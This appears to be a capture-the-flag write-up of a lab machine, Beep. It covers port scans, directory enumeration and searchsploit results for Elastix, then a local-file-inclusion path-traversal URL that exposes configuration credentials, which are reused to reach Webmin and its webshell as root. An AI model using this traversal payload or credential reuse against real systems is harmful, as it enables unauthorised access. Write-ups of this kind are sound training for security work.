With a handful of Windows boxes done now, I decided it was time to derust and pop a Linux box - ended up beiong pretty interesting since you get both flags at pretty much the same time!
Nmap start:
sudo nmap -sC -sV 10.129.229.183 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 25/tcp open smtp? |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.129.229.183/ 110/tcp open pop3? 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 852/udp status |_ 100024 1 855/tcp status 143/tcp open imap? 443/tcp open ssl/https? |_ssl-date: 2026-06-05T12:41:10+00:00; +3s from scanner time. | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 993/tcp open imaps? 995/tcp open pop3s? 3306/tcp open mysql? 4445/tcp open upnotifyp? 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-server-header: MiniServ/1.570 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
The machine hands us a bunch of openings - there's an abundance of ports ranging from mailing ports, a databases, a webapp, alongside Webmin.
Port 80 redirects to 443, which is hosting Elastix, a communications server. Default credentials did not work, so I searched for endpoints next:
/images (Status: 301) [Size: 318] [--> https://10.129.229.183/images/] /admin (Status: 301) [Size: 317] [--> https://10.129.229.183/admin/] /modules (Status: 301) [Size: 319] [--> https://10.129.229.183/modules/] /themes (Status: 301) [Size: 318] [--> https://10.129.229.183/themes/] /help (Status: 301) [Size: 316] [--> https://10.129.229.183/help/] /mail (Status: 301) [Size: 316] [--> https://10.129.229.183/mail/] /var (Status: 301) [Size: 315] [--> https://10.129.229.183/var/] /lang (Status: 301) [Size: 316] [--> https://10.129.229.183/lang/] /static (Status: 301) [Size: 318] [--> https://10.129.229.183/static/] /libs (Status: 301) [Size: 316] [--> https://10.129.229.183/libs/] /. (Status: 200) [Size: 1785] /panel (Status: 301) [Size: 317] [--> https://10.129.229.183/panel/] /configs (Status: 301) [Size: 319] [--> https://10.129.229.183/configs/] /recordings (Status: 301) [Size: 322] [--> https://10.129.229.183/recordings/] /vtigercrm (Status: 301) [Size: 321] [--> https://10.129.229.183/vtigercrm/]
Login to /admin (in the form of a pop-up) doesn't work either so I press cancel and get booted to https://10.129.229.183/admin/config.php:
Using searchsploit, we find out that Elastiv is vulnerable to LFI and RCE...
searchsploit elastix ------------------------------------------------------------------- -------------------- Exploit Title | Path ------------------------------------------------------------------- -------------------- Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py ------------------------------------------------------------------- -------------------- Shellcodes: No Results
Running searchsploit -x php/webapps/37637.pl
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
This ends up being one of the endpoints gobuster found!
By the looks of it, current_language points to a file inside the machine's system. The link above nets us some handy info:
AMPDBHOST=localhost AMPDBENGINE=mysql # AMPDBNAME=asterisk AMPDBUSER=asteriskuser # AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE
Above are two user/password combinations - asteriskuser:jEhdIekWmdjE and admin:jEhdIekWmdjE. I tried logging into Webmin with the latter, but to no avail - it works with root as the username however.
This gives us access to manage the system as root. There are plenty of options which could net us both flags, such as an accessible webshell inside of Webmin (I can just straight up fetch both flags), changing passwords of user (after which I can SSH into the machine as root), scheduling commands and cron jobs (for securing a reverse shell), etc.
The webshell in effect
This nets us both flags! In the end I ended up using only a few ports' services, so I'm sure there's more to this machine :) good luck to anyone else trying to pop this box!